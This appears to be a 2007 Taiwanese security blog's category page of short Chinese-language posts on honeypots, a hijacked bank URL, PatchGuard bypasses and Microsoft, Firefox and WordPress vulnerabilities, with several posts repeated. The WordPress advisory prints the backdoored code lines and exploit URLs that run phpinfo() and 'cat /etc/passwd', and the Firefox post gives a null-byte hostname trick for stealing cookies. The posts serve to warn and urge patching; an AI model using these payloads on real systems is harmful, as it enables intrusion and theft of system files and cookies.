目前分類:資訊安全 (11)
- Jul 11 Wed 2007 11:56
大陸網站刊登台灣海軍演習照片
- Jul 11 Wed 2007 11:55
Google 併購資安公司 Postini
- Jun 27 Wed 2007 10:51
第一屆OWASP台灣分會高峰會議 (OWASP-TW 2007)
- May 10 Thu 2007 12:01
公告:台灣地區惡意程式與駭客攻擊行為誘捕系統免費架設計畫
計畫主旨:
台灣地區惡意程式所佔的比率節節高升,尤其是以校園為大宗。在普遍缺乏惡意程式基本知識的校園內,希望透過架設惡意程式誘捕系統來誘捕惡意程式與駭客攻擊行為,讓參與單位清楚掌握校園內惡意程式與駭客攻擊的來源,然後,對症下藥,以收成效。
請按我..繼續閱讀全文....
台灣地區惡意程式所佔的比率節節高升,尤其是以校園為大宗。在普遍缺乏惡意程式基本知識的校園內,希望透過架設惡意程式誘捕系統來誘捕惡意程式與駭客攻擊行為,讓參與單位清楚掌握校園內惡意程式與駭客攻擊的來源,然後,對症下藥,以收成效。
請按我..繼續閱讀全文....
- Apr 11 Wed 2007 06:25
玉山票劵網址連至色情網站
玉山票劵網址連至色情網站。查了一下,玉山票?已經併入玉山銀行,可能是他們沒有保留那個網址 (可能會影響玉山銀行商譽),使得有心人士利用此網址,誤導消費者連至那個色情網站。最麻煩的是很多網站還保留玉山票?舊網址,其中包含行政院金融監督管理委員會銀行局、台灣金融研訓院等 (已經通知他們,並且已經修復),應該還有蠻多網站都有此問題,各位可以利用搜尋引擎查一查囉。另外,我想玉山銀行應該要通報調查局,然後,調查局可以調查一下,倒底是什麼樣的狀況。(Credit: Edward)
**請幫忙通知他們,謝謝**
下圖是此色情網站首頁:
下圖是金管會含有此連結的網頁:
下圖是金管會修正此連結後的網頁:
下圖是台灣金融研訓院含有此連結的網頁:
下圖是台灣金融研訓院修正此連結後的網頁:
此色情網站的註冊資訊 (也許是網站被黑,也說不一定) :
**請幫忙通知他們,謝謝**
下圖是此色情網站首頁:
下圖是金管會含有此連結的網頁:
下圖是金管會修正此連結後的網頁:
下圖是台灣金融研訓院含有此連結的網頁:
下圖是台灣金融研訓院修正此連結後的網頁:
此色情網站的註冊資訊 (也許是網站被黑,也說不一定) :
- Mar 04 Sun 2007 08:32
WordPress 2.1.1 有安全漏洞
著名的部落格軟體 WordPress 2.1.1 有安全漏洞,可以輕易地執行遠端程式碼,請盡速更新至 WordPress 2.1.2。
有問題的檔案:
如何利用此漏洞:
受影響的版本:只有 2.1.1
至於詳細的資訊,請參考:
WordPress 2.1.1 Dangerous, Upgrade
WordPress source code compromised to enable remote code execution-----
有問題的檔案:
- feed.php: if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
- theme.php: if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
如何利用此漏洞:
- http://wordpressurl/wp-includes/feed.php?ix=phpinfo();
- http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd
受影響的版本:只有 2.1.1
至於詳細的資訊,請參考:
WordPress 2.1.1 Dangerous, Upgrade
WordPress source code compromised to enable remote code execution-----
- Feb 23 Fri 2007 12:15
繞過 PatchGuard 的監控
PatchGuard 到底是什麼呢?這是微軟為了防止惡意程式或其他廠商修改 Windows 作業系統架構,所提供的一個 Windows 核心 (Kernel) 防護機制。此功能只支援 Windows x64 版本。
為什麼要保護 Windows 核心呢?如果惡意程式感染 Windows 核心,它就可以獲得至高無上的系統權限,可以為所欲為。很多駭客或安全專家都積極在嘗試破解此項功能,正如大家所預期,他們很快就找到方法,其中一個名為 Skywing,提供一些方法以繞過 PatchGuard 的檢測,如果各位有興趣的話,請參考 Bypassing PatchGuard on Windows x64 和 Subverting PatchGuard Version 2 這兩篇文章。
安全性、便利性和功能性本來就無法兼顧,如果一味地強調安全性,那個系統一定很難操作以及很少功能,所以,如何取得平衡是一個很難抉擇的問題。-----
為什麼要保護 Windows 核心呢?如果惡意程式感染 Windows 核心,它就可以獲得至高無上的系統權限,可以為所欲為。很多駭客或安全專家都積極在嘗試破解此項功能,正如大家所預期,他們很快就找到方法,其中一個名為 Skywing,提供一些方法以繞過 PatchGuard 的檢測,如果各位有興趣的話,請參考 Bypassing PatchGuard on Windows x64 和 Subverting PatchGuard Version 2 這兩篇文章。
安全性、便利性和功能性本來就無法兼顧,如果一味地強調安全性,那個系統一定很難操作以及很少功能,所以,如何取得平衡是一個很難抉擇的問題。-----
- Feb 16 Fri 2007 11:26
Firefox Cookie 安全漏洞 (Null 字元 “\x00″)
Firefox 對 DOM (Document Object Model) 屬性 "location.hostname" 處理不當,使得攻擊者有機會取得使用者含有機密資料的 Cookie 檔案。
此漏洞的關鍵在於 Null 字元 ("\x00")。當攻擊者將惡意網站的 "location.hostname"設為 "attackersite.com\x00trustedsite.com",Firefox 會認為是 "trustedsite.com",而將使用者的 cookie 檔案送到 "attackersite.com"。
受影響版本:2.0.0.1 或 其他 (未測試過)
如果你想要觀看此漏洞的展示,請看這裡。
雖然,你可以找到暫時性的解決方案,但對一般使用者來說,可能不會設定,所以,還是使用 Firefox 提供的自動更新,如下圖所示:
另外,再一次提醒各位,請勿瀏覽來路不明的網站。
至於詳細的資訊,請參考:
Zalewski cookie setting / same-domain bypass vulnerability
Firefox Same-Domain Bypass Vulnerability (NULL Character)
此漏洞的關鍵在於 Null 字元 ("\x00")。當攻擊者將惡意網站的 "location.hostname"設為 "attackersite.com\x00trustedsite.com",Firefox 會認為是 "trustedsite.com",而將使用者的 cookie 檔案送到 "attackersite.com"。
受影響版本:2.0.0.1 或 其他 (未測試過)
如果你想要觀看此漏洞的展示,請看這裡。
雖然,你可以找到暫時性的解決方案,但對一般使用者來說,可能不會設定,所以,還是使用 Firefox 提供的自動更新,如下圖所示:
另外,再一次提醒各位,請勿瀏覽來路不明的網站。
至於詳細的資訊,請參考:
Zalewski cookie setting / same-domain bypass vulnerability
Firefox Same-Domain Bypass Vulnerability (NULL Character)
- Feb 16 Fri 2007 11:26
Firefox Cookie 安全漏洞 (Null 字元 “x00″)
Firefox 對 DOM (Document Object Model) 屬性 "location.hostname" 處理不當,使得攻擊者有機會取得使用者含有機密資料的 Cookie 檔案。
此漏洞的關鍵在於 Null 字元 ("\x00")。當攻擊者將惡意網站的 "location.hostname"設為 "attackersite.com\x00trustedsite.com",Firefox 會認為是 "trustedsite.com",而將使用者的 cookie 檔案送到 "attackersite.com"。
受影響版本:2.0.0.1 或 其他 (未測試過)
如果你想要觀看此漏洞的展示,請看這裡。
雖然,你可以找到暫時性的解決方案,但對一般使用者來說,可能不會設定,所以,還是使用 Firefox 提供的自動更新,如下圖所示:
另外,再一次提醒各位,請勿瀏覽來路不明的網站。
至於詳細的資訊,請參考:
Zalewski cookie setting / same-domain bypass vulnerability
Firefox Same-Domain Bypass Vulnerability (NULL Character)
此漏洞的關鍵在於 Null 字元 ("\x00")。當攻擊者將惡意網站的 "location.hostname"設為 "attackersite.com\x00trustedsite.com",Firefox 會認為是 "trustedsite.com",而將使用者的 cookie 檔案送到 "attackersite.com"。
受影響版本:2.0.0.1 或 其他 (未測試過)
如果你想要觀看此漏洞的展示,請看這裡。
雖然,你可以找到暫時性的解決方案,但對一般使用者來說,可能不會設定,所以,還是使用 Firefox 提供的自動更新,如下圖所示:
另外,再一次提醒各位,請勿瀏覽來路不明的網站。
至於詳細的資訊,請參考:
Zalewski cookie setting / same-domain bypass vulnerability
Firefox Same-Domain Bypass Vulnerability (NULL Character)
- Feb 15 Thu 2007 03:14
MS Word 出現另一個安全漏洞
西洋情人節當天,微軟發佈另一個 Word 安全漏洞,此漏洞允許攻擊者執行遠端程式碼。目前沒有修補程式。
受影響軟體:
至於其他詳細的資訊,請參考 Microsoft Security Advisory (933052)。-----
受影響軟體:
- Microsoft Office 2000 (Word 2000)
- Microsoft Office XP (Word 2002)
至於其他詳細的資訊,請參考 Microsoft Security Advisory (933052)。-----
- Feb 14 Wed 2007 09:13
微軟 2007 年 2 月 安全漏洞修補程式
昨天微軟發佈 2007 年 2 月 安全漏洞修補程式,包含 12 個安全公告,6 個為重大嚴重性 (Critical),6 個為重要嚴重性 (Important),如下所示:
至於其他詳細的部份,請參考 Microsoft Security Bulletin Summary for February, 2007。-----
- Step-by-Step Interactive Training (MS07-005)
- 最高的嚴重性等級:重要 (Important)
- 允許遠端執行程式碼 (Could Allow Remote Code Execution)
- Windows Shell (MS07-006)
- 最高的嚴重性等級:重要 (Important)
- 允許提升權限 (Could Allow Elevation of Privilege )
- Windows Image Acquisition Service (MS07-007)
- 最高的嚴重性等級:重要 (Important)
- 允許提升權限
- HTML Help ActiveX Control (MS07-008)
- 最高的嚴重性等級:重大 (Critical)
- 允許遠端執行程式碼
- Microsoft Data Access Components (MS07-009)
- 最高的嚴重性等級:重大 (Critical)
- 允許遠端執行程式碼
- Microsoft Malware Protection Engine (MS07-010)
- 最高的嚴重性等級:重大 (Critical)
- 允許遠端執行程式碼
- Microsoft OLE Dialog (MS07-011)
- 最高的嚴重性等級:重要 (Important)
- 允許遠端執行程式碼
- Microsoft MFC (MS07-012)
- 最高的嚴重性等級:重要 (Important)
- 允許遠端執行程式碼
- Microsoft RichEdit (MS07-013)
- 最高的嚴重性等級:重要 (Important)
- 允許遠端執行程式碼
- Microsoft Word (MS07-014)
- 最高的嚴重性等級:重大 (Critical)
- 允許遠端執行程式碼
- Microsoft Office (MS07-015)
- 最高的嚴重性等級:重大 (Critical)
- 允許遠端執行程式碼
- Cumulative Security Update for Internet Explorer (MS07-016)
- 最高的嚴重性等級:重大 (Critical)
- 允許遠端執行程式碼
至於其他詳細的部份,請參考 Microsoft Security Bulletin Summary for February, 2007。-----
